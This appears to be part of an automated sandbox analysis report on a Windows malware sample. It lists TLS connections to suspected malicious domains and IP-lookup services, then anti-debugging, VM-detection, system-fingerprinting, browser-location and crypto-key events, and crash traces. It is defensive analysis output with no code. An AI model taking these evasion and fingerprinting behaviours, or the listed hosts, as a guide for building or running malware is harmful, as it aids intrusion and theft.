TLSv1 192.168.56.103:49398 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49402 172.67.134.37:443	C=US, O=Let's Encrypt, CN=R3	CN=*.dumancue.com	4a:2b:54:3e:8d:a5:46:7e:82:b4:21:eb:7d:ad:a5:e9:df:a4:cd:16
TLSv1 192.168.56.103:49359 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49364 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49414 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49416 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49380 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49401 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49419 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49420 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49422 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49408 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49410 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49415 172.67.134.37:443	C=US, O=Let's Encrypt, CN=R3	CN=*.dumancue.com	4a:2b:54:3e:8d:a5:46:7e:82:b4:21:eb:7d:ad:a5:e9:df:a4:cd:16
TLSv1 192.168.56.103:49426 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49444 172.67.128.223:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=California, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	8e:5a:12:fe:f0:75:65:35:6e:4d:a8:b6:d4:88:53:8c:02:1a:7c:99
TLSv1 192.168.56.103:49445 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49457 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLS 1.2 192.168.56.103:49464 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	54:e1:a7:9d:cc:c8:60:86:f1:a5:da:74:0e:5a:ab:45:df:37:8a:78
TLSv1 192.168.56.103:49463 77.88.55.66:443	C=RU, O=Yandex LLC, OU=Yandex Certification Authority, CN=Yandex CA	C=RU, L=Moscow, OU=ITO, O=Yandex LLC, CN=*.yandex.az	2b:13:52:0c:b0:c6:8c:c9:e3:05:6e:11:91:74:4d:65:ce:3a:64:29
TLSv1 192.168.56.103:49476 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49477 149.28.253.196:443	C=CN, O=TrustAsia Technologies, Inc., OU=Domain Validated SSL, CN=TrustAsia TLS RSA CA	CN=listincode.com	84:23:95:42:66:09:11:39:0d:e6:22:7f:eb:b3:cc:79:dd:fa:36:ed
TLSv1 192.168.56.103:49479 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb
TLSv1 192.168.56.103:49430 162.159.135.233:443	None	None	None
TLSv1 192.168.56.103:49467 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49486 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63
TLSv1 192.168.56.103:49435 162.159.135.233:443	C=US, O=Cloudflare, Inc., CN=Cloudflare Inc RSA CA-2	C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com	a6:26:df:21:b9:4f:a7:fb:ae:8d:87:ce:fb:7d:2b:c6:50:8b:ff:da
TLSv1 192.168.56.103:49438 172.67.204.112:443	C=US, O=Let's Encrypt, CN=R3	CN=*.gogamec.com	ee:4c:93:4c:ed:a7:33:d6:e8:4b:a4:7f:af:73:91:a4:cf:9b:23:b1
TLSv1 192.168.56.103:49462 77.88.55.50:443	C=RU, O=Yandex LLC, OU=Yandex Certification Authority, CN=Yandex CA	C=RU, L=Moscow, OU=ITO, O=Yandex LLC, CN=*.yandex.az	2b:13:52:0c:b0:c6:8c:c9:e3:05:6e:11:91:74:4d:65:ce:3a:64:29
TLSv1 192.168.56.103:49488 34.117.59.81:443	C=US, O=Google Trust Services LLC, CN=GTS CA 1D4	CN=ipinfo.io	f0:42:a0:3b:5b:a8:0e:51:f4:13:25:f7:fc:7c:dc:35:63:19:75:63

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Nov. 5, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 5, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 5, 2021, 8:58 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 5, 2021, 8:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 5, 2021, 9 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 5, 2021, 8:59 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Nov. 5, 2021, 9:07 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (16 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Nov. 5, 2021, 9:05 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 8:58 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 8:58 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 8:58 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 8:58 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0
IsDebuggerPresent Nov. 5, 2021, 9:07 a.m.			0	0

Uses Windows APIs to generate a cryptographic key (21 events)

Time & API	Arguments	Status	Return
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d0178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d0178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d00f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d0178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d0178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d00f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d00f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d01f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005d01f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057c0f8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0057c178 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9e70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9e70 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x006c9eb0 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076f308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076f308 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0076f348 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00562378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x00562378 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Nov. 5, 2021, 9:07 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005623b8 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Collects information to fingerprint the system (MachineGuid, DigitalProductId, SystemBiosDate) (1 event)

registry

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

Tries to locate where the browsers are installed (2 events)

file	C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
registry	HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Nov. 5, 2021, 8:58 a.m.		1	1	0

The executable contains unknown PE section names indicative of a packer (could be a false positive) (3 events)

section	CODE
section	DATA
section	BSS

One or more processes crashed (23 events)

Time & API	Arguments	Status
__exception__ Nov. 5, 2021, 9:06 a.m.	stacktrace: kak+0x816a8 @ 0x4816a8 kak+0x99c13 @ 0x499c13 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0xeedface exception.offset: 46887 exception.address: 0x766fb727 registers.esp: 1637924 registers.edi: 4523332 registers.eax: 1637924 registers.ebp: 1638004 registers.edx: 0 registers.ebx: 0 registers.esi: 2 registers.ecx: 7	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x37bc6ed 0x37bc79a 0x37bc808 0x3730a09 0x3731cba 0x3731290 0x37315cd 0x3748939 0x377d9d7 0x377ddeb 0x37df571 0x37df654 bumperww+0xe9a5 @ 0xd2e9a5 bumperww+0x13f91 @ 0xd33f91 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 7070260 registers.edi: 0 registers.eax: 0 registers.ebp: 7070300 registers.edx: 32 registers.ebx: 7070604 registers.esi: 0 registers.ecx: 5409712	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x37bc6ed 0x37bc79a 0x37bc808 0x3730a09 0x3731cba 0x373129e 0x37315cd 0x3748939 0x377d9d7 0x377ddeb 0x37df571 0x37df654 bumperww+0xe9a5 @ 0xd2e9a5 bumperww+0x13f91 @ 0xd33f91 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 7070260 registers.edi: 0 registers.eax: 0 registers.ebp: 7070300 registers.edx: 32 registers.ebx: 7070604 registers.esi: 0 registers.ecx: 5409712	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x37bc6ed 0x37bc79a 0x37bc808 0x3730a09 0x3731cba 0x3731290 0x37315cd 0x3748939 0x3749831 0x3776065 0x3776d41 0x377dbbe 0x377ddeb 0x37df571 0x37df654 bumperww+0xe9a5 @ 0xd2e9a5 bumperww+0x13f91 @ 0xd33f91 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 7064292 registers.edi: 0 registers.eax: 0 registers.ebp: 7064332 registers.edx: 32 registers.ebx: 7064636 registers.esi: 0 registers.ecx: 5409992	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x37bc6ed 0x37bc79a 0x37bc808 0x3730a09 0x3731cba 0x373129e 0x37315cd 0x3748939 0x3749831 0x3776065 0x3776d41 0x377dbbe 0x377ddeb 0x37df571 0x37df654 bumperww+0xe9a5 @ 0xd2e9a5 bumperww+0x13f91 @ 0xd33f91 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 7064292 registers.edi: 0 registers.eax: 0 registers.ebp: 7064332 registers.edx: 32 registers.ebx: 7064636 registers.esi: 0 registers.ecx: 5409992	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x37bc6ed 0x37bc79a 0x37bc808 0x3730a09 0x3731cba 0x3731290 0x37315cd 0x3748939 0x3749095 0x3776eb3 0x377dbbe 0x377ddeb 0x37df571 0x37df654 bumperww+0xe9a5 @ 0xd2e9a5 bumperww+0x13f91 @ 0xd33f91 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 7064708 registers.edi: 0 registers.eax: 0 registers.ebp: 7064748 registers.edx: 32 registers.ebx: 7065052 registers.esi: 0 registers.ecx: 4973536	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x37bc6ed 0x37bc79a 0x37bc808 0x3730a09 0x3731cba 0x373129e 0x37315cd 0x3748939 0x3749095 0x3776eb3 0x377dbbe 0x377ddeb 0x37df571 0x37df654 bumperww+0xe9a5 @ 0xd2e9a5 bumperww+0x13f91 @ 0xd33f91 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 7064708 registers.edi: 0 registers.eax: 0 registers.ebp: 7064748 registers.edx: 32 registers.ebx: 7065052 registers.esi: 0 registers.ecx: 4973536	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x39cc6ed 0x39cc79a 0x39cc808 0x3940a09 0x3941cba 0x3941290 0x39415cd 0x3958939 0x398d9d7 0x398ddeb 0x39ef571 0x39ef654 ww15_testll_0310_single+0x3eb9 @ 0xb83eb9 ww15_testll_0310_single+0x8eb1 @ 0xb88eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 11067588 registers.edi: 0 registers.eax: 0 registers.ebp: 11067628 registers.edx: 32 registers.ebx: 11067932 registers.esi: 0 registers.ecx: 5595016	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x39cc6ed 0x39cc79a 0x39cc808 0x3940a09 0x3941cba 0x394129e 0x39415cd 0x3958939 0x398d9d7 0x398ddeb 0x39ef571 0x39ef654 ww15_testll_0310_single+0x3eb9 @ 0xb83eb9 ww15_testll_0310_single+0x8eb1 @ 0xb88eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 11067588 registers.edi: 0 registers.eax: 0 registers.ebp: 11067628 registers.edx: 32 registers.ebx: 11067932 registers.esi: 0 registers.ecx: 5595016	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x39cc6ed 0x39cc79a 0x39cc808 0x3940a09 0x3941cba 0x3941290 0x39415cd 0x3958939 0x3959831 0x3986065 0x3986d41 0x398dbbe 0x398ddeb 0x39ef571 0x39ef654 ww15_testll_0310_single+0x3eb9 @ 0xb83eb9 ww15_testll_0310_single+0x8eb1 @ 0xb88eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 11061620 registers.edi: 0 registers.eax: 0 registers.ebp: 11061660 registers.edx: 32 registers.ebx: 11061964 registers.esi: 0 registers.ecx: 5595336	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x39cc6ed 0x39cc79a 0x39cc808 0x3940a09 0x3941cba 0x394129e 0x39415cd 0x3958939 0x3959831 0x3986065 0x3986d41 0x398dbbe 0x398ddeb 0x39ef571 0x39ef654 ww15_testll_0310_single+0x3eb9 @ 0xb83eb9 ww15_testll_0310_single+0x8eb1 @ 0xb88eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 11061620 registers.edi: 0 registers.eax: 0 registers.ebp: 11061660 registers.edx: 32 registers.ebx: 11061964 registers.esi: 0 registers.ecx: 5595336	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x39cc6ed 0x39cc79a 0x39cc808 0x3940a09 0x3941cba 0x3941290 0x39415cd 0x3958939 0x3959095 0x3986eb3 0x398dbbe 0x398ddeb 0x39ef571 0x39ef654 ww15_testll_0310_single+0x3eb9 @ 0xb83eb9 ww15_testll_0310_single+0x8eb1 @ 0xb88eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 11062036 registers.edi: 0 registers.eax: 0 registers.ebp: 11062076 registers.edx: 32 registers.ebx: 11062380 registers.esi: 0 registers.ecx: 5105120	1
__exception__ Nov. 5, 2021, 9:07 a.m.	stacktrace: CryptGenRandom+0x26 CryptGetUserKey-0x6a cryptsp+0x4f99 @ 0x73d54f99 0x39cc6ed 0x39cc79a 0x39cc808 0x3940a09 0x3941cba 0x394129e 0x39415cd 0x3958939 0x3959095 0x3986eb3 0x398dbbe 0x398ddeb 0x39ef571 0x39ef654 ww15_testll_0310_single+0x3eb9 @ 0xb83eb9 ww15_testll_0310_single+0x8eb1 @ 0xb88eb1 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x768733ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x772e9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x772e9ea5 exception.instruction_r: 81 78 74 11 11 11 11 75 2d 83 c0 78 50 ff 15 44 exception.instruction: cmp dword ptr [eax + 0x74], 0x11111111 exception.exception_code: 0xc0000005 exception.symbol: CryptEnumProvidersA+0x1dc CheckSignatureInFile-0x9f6 cryptsp+0x34b2 exception.address: 0x73d534b2 registers.esp: 11062036 registers.edi: 0 registers.eax: 0 registers.ebp: 11062076 registers.edx: 32 registers.ebx: 11062380 registers.esi: 0 registers.ecx: 5105120	1
